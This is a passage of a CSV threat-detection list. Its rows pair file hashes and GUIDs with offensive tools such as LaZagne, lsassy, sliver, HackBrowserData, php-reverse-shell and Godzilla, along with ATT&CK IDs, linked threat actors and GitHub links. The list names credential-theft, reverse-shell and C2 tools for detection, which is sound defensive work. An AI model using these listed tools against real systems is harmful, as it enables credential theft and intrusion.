T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","30244" "*8529307629293748098f5a78900d1685d70131e05d2dc399be5701a89dfb0a9a*",".{0,1000}8529307629293748098f5a78900d1685d70131e05d2dc399be5701a89dfb0a9a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30245" "*853d769d63efcbc5d78f3f81c7cae176bf34c248d3bbbf6f32b4bc5d5de561e8*",".{0,1000}853d769d63efcbc5d78f3f81c7cae176bf34c248d3bbbf6f32b4bc5d5de561e8.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","30246" "*85474d2a885a2dbe2dfd334d9d25fbf1079c1d88c857428e2e1cf3e59f2c0a9b*",".{0,1000}85474d2a885a2dbe2dfd334d9d25fbf1079c1d88c857428e2e1cf3e59f2c0a9b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30248" "*855322cbaedbf7d7ea08a730405d5969a4f754a75571791b357d8ddce030e89f*",".{0,1000}855322cbaedbf7d7ea08a730405d5969a4f754a75571791b357d8ddce030e89f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30249" "*8558952E-C76B-4976-949F-76A977DA7F8A*",".{0,1000}8558952E\-C76B\-4976\-949F\-76A977DA7F8A.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC 
Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#GUIDproject","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","30251" "*8559d164a6628834d0b6cf4ff457cb2d30d4960116f8c0e56e6510243f38d6f3*",".{0,1000}8559d164a6628834d0b6cf4ff457cb2d30d4960116f8c0e56e6510243f38d6f3.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30253" "*8560ec462441496a3bd6b0266ed1b023cdb1870a190aaa9dbb34ffcc6e6dd281*",".{0,1000}8560ec462441496a3bd6b0266ed1b023cdb1870a190aaa9dbb34ffcc6e6dd281.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","30255" "*85687380038c8fa0370f374f5bf4e087c8a34c03aee886f938f1b05be4dc3efa*",".{0,1000}85687380038c8fa0370f374f5bf4e087c8a34c03aee886f938f1b05be4dc3efa.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30256" "*85712775f9a4080bea10df95280c55f5b120f32ec92f1cdaf0a1c55f58788a66*",".{0,1000}85712775f9a4080bea10df95280c55f5b120f32ec92f1cdaf0a1c55f58788a66.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large 
Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","30257" "*8574d9733f8ab02facc74b6b2e51a5a0f4eb5c370e005de4987586cb53b52314*",".{0,1000}8574d9733f8ab02facc74b6b2e51a5a0f4eb5c370e005de4987586cb53b52314.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30259" "*857a3380915575e74c40f0a36d92fdb55228a3c96476e90e902b440e921be6d1*",".{0,1000}857a3380915575e74c40f0a36d92fdb55228a3c96476e90e902b440e921be6d1.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","30262" "*857d1a53ab8df17acd27c5a26a77cdf070b2cd6e78bcbf011eef3c81dd5cd9ae*",".{0,1000}857d1a53ab8df17acd27c5a26a77cdf070b2cd6e78bcbf011eef3c81dd5cd9ae.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30263" 
"*858655414a0c3c0a9d6fcb466c47a06d7c9f19c69aa5c3635fd25fd7f017bae3*",".{0,1000}858655414a0c3c0a9d6fcb466c47a06d7c9f19c69aa5c3635fd25fd7f017bae3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30264" "*8588f8405c9048a5356cb2376ffdb20eef599763b96930818b757f4df3909841*",".{0,1000}8588f8405c9048a5356cb2376ffdb20eef599763b96930818b757f4df3909841.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30265" "*858d9587a7b7bd18b9f1b3bafc61084475898fc185ef1e2fecdf0777e58e1531*",".{0,1000}858d9587a7b7bd18b9f1b3bafc61084475898fc185ef1e2fecdf0777e58e1531.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","30266" "*85929c3b220867064975eb8a6ca57cd5b22b801e3f805e653f298f3e6cebe6a3*",".{0,1000}85929c3b220867064975eb8a6ca57cd5b22b801e3f805e653f298f3e6cebe6a3.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30267" "*8596bb9703901bd2b0174aa550288f303e26f27d72a26daff201e7ea709da002*",".{0,1000}8596bb9703901bd2b0174aa550288f303e26f27d72a26daff201e7ea709da002.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","30268" "*859f9de41d70b9ac3d1fd32c3b8f71c6b73014795e93b7c9b47ecbefc8e089ff*",".{0,1000}859f9de41d70b9ac3d1fd32c3b8f71c6b73014795e93b7c9b47ecbefc8e089ff.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30269" "*85a5981495372d449656d4da528a0884e3bf06307f0e52756823cd474a687cc6*",".{0,1000}85a5981495372d449656d4da528a0884e3bf06307f0e52756823cd474a687cc6.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","30270" 
"*85a64d925bmsh374c814867fca19p1c3880jsn5cff8c77bdb3*",".{0,1000}85a64d925bmsh374c814867fca19p1c3880jsn5cff8c77bdb3.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#certificate","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","30272" "*85a88db7ae01c7735386630ef780fbabdf465b9b9fb1e30e5ea698b114a33540*",".{0,1000}85a88db7ae01c7735386630ef780fbabdf465b9b9fb1e30e5ea698b114a33540.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","30273" "*85aaaf71639238e67726b8e50e29efc74bd78dbbd361c38686e19795aebe34a1*",".{0,1000}85aaaf71639238e67726b8e50e29efc74bd78dbbd361c38686e19795aebe34a1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","30274" "*85b041052e2b8aba7219fedcf3e54d9df17bb97185862df67b42c76a60d3ba89*",".{0,1000}85b041052e2b8aba7219fedcf3e54d9df17bb97185862df67b42c76a60d3ba89.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - 
LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30275" "*85d455c911c6f67f917c9a9ebb8c42595d5337648d726b9fc0c5b4c94fd628db*",".{0,1000}85d455c911c6f67f917c9a9ebb8c42595d5337648d726b9fc0c5b4c94fd628db.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30281" "*85e3e5dbf52f38be79b8ddf3f0de3ae1250584fde316728b96be26b697f36df0*",".{0,1000}85e3e5dbf52f38be79b8ddf3f0de3ae1250584fde316728b96be26b697f36df0.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","30283" "*85ef86a80dfd91208cf5eaaafd220a584c591ed83c22ee039b31b9849d7428d0*",".{0,1000}85ef86a80dfd91208cf5eaaafd220a584c591ed83c22ee039b31b9849d7428d0.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","30285" "*85fcc2b2c19bc9355cbe509a9ef3ebe10005f1c8a9887df12a6295f25008d260*",".{0,1000}85fcc2b2c19bc9355cbe509a9ef3ebe10005f1c8a9887df12a6295f25008d260.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30287" "*86053063d021c510dd6ef09ac6e21ad5f6f6cb7081c53f8d5809a8c10eb562a2*",".{0,1000}86053063d021c510dd6ef09ac6e21ad5f6f6cb7081c53f8d5809a8c10eb562a2.{0,1000}","offensive_tool_keyword","PrivFu","Tool to execute token assigned process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TokenAssignor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","30288" "*8613f6bd93b3ef201a4ef71a88d67c78cbbe693f71729eecf58d3ef06306610f*",".{0,1000}8613f6bd93b3ef201a4ef71a88d67c78cbbe693f71729eecf58d3ef06306610f.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","#filehash","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","30289" "*861c5434860a97737943516d0e93e91f5484c8ea557672763ab55bb8c4bbc979*",".{0,1000}861c5434860a97737943516d0e93e91f5484c8ea557672763ab55bb8c4bbc979.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30290" "*862a3fb241e9b9e821a5612e1dd5f7565aefdaee978bef994bc4817d9711409d*",".{0,1000}862a3fb241e9b9e821a5612e1dd5f7565aefdaee978bef994bc4817d9711409d.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","30292" "*862DA0DA-52E1-47CD-B9C2-46B106031B28*",".{0,1000}862DA0DA\-52E1\-47CD\-B9C2\-46B106031B28.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","30293" 
"*862f7ba58bbf77543812637ecc32d277fce062d21bc97587e5816e8fb05634e3*",".{0,1000}862f7ba58bbf77543812637ecc32d277fce062d21bc97587e5816e8fb05634e3.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","30294" "*863e5c3db9d52c8af4ad2976dbfe510a8eaaec2affba50a5abd916e440e18804*",".{0,1000}863e5c3db9d52c8af4ad2976dbfe510a8eaaec2affba50a5abd916e440e18804.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","30295" "*863f8f71cce6acffa596561047c4592087b08a66438bd5500a4053169f31a9ce*",".{0,1000}863f8f71cce6acffa596561047c4592087b08a66438bd5500a4053169f31a9ce.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30296" "*863ff084e43b0829de8870f7bfdbc151bb486e491bde6d644ef82acf61709e0e*",".{0,1000}863ff084e43b0829de8870f7bfdbc151bb486e491bde6d644ef82acf61709e0e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - 
AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30297" "*86445d7ef450ddcb190f14c6f7fc8a1a33945c45*",".{0,1000}86445d7ef450ddcb190f14c6f7fc8a1a33945c45.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","30298" "*86454256f4e6edb85bf0688e39d1b7acbf8c4f053d77b1e8261610352e8dfdf0*",".{0,1000}86454256f4e6edb85bf0688e39d1b7acbf8c4f053d77b1e8261610352e8dfdf0.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30299" "*8648dfc2aff4508e8469d1ed4a7a775b558527bfb0050ba4ed75db259b07943d*",".{0,1000}8648dfc2aff4508e8469d1ed4a7a775b558527bfb0050ba4ed75db259b07943d.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","#filehash","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","30300" "*86492637e46635ef72b4660016c2b3fdbb4c581b5f8dec1b6dc2dd8c04031e93*",".{0,1000}86492637e46635ef72b4660016c2b3fdbb4c581b5f8dec1b6dc2dd8c04031e93.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30301" "*86493698c14d838bdef05d96811391a6dc29b9066ee5183f3d1924eff21bda56*",".{0,1000}86493698c14d838bdef05d96811391a6dc29b9066ee5183f3d1924eff21bda56.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","30302" "*864a9a2d56ee0ff1d01e161fd8a76bb64c354ab435d84701d241800ba460012b*",".{0,1000}864a9a2d56ee0ff1d01e161fd8a76bb64c354ab435d84701d241800ba460012b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30303" "*864d5b274e7600971d3e1cadeecfe4e23eac2db6a284648e7dca7002efc66af1*",".{0,1000}864d5b274e7600971d3e1cadeecfe4e23eac2db6a284648e7dca7002efc66af1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","30304" "*864ffadb188961088d28a0b5c5965f88ed9d07ec8f4c2301bd768d2c0cbcfde5*",".{0,1000}864ffadb188961088d28a0b5c5965f88ed9d07ec8f4c2301bd768d2c0cbcfde5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30305" 
"*86558db784a8bc92ef0e6618e81f7f75809aa39e05bb04baf00688aa8c4470da*",".{0,1000}86558db784a8bc92ef0e6618e81f7f75809aa39e05bb04baf00688aa8c4470da.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30306" "*8659af289bd4328901e5ba6e08a8ecead915c02a1d402a154ee3cddd16b65999*",".{0,1000}8659af289bd4328901e5ba6e08a8ecead915c02a1d402a154ee3cddd16b65999.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","30307" "*865c9da731e9dedc483277985a51af9ef08f736e512447233ac4bec008539443*",".{0,1000}865c9da731e9dedc483277985a51af9ef08f736e512447233ac4bec008539443.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30309" 
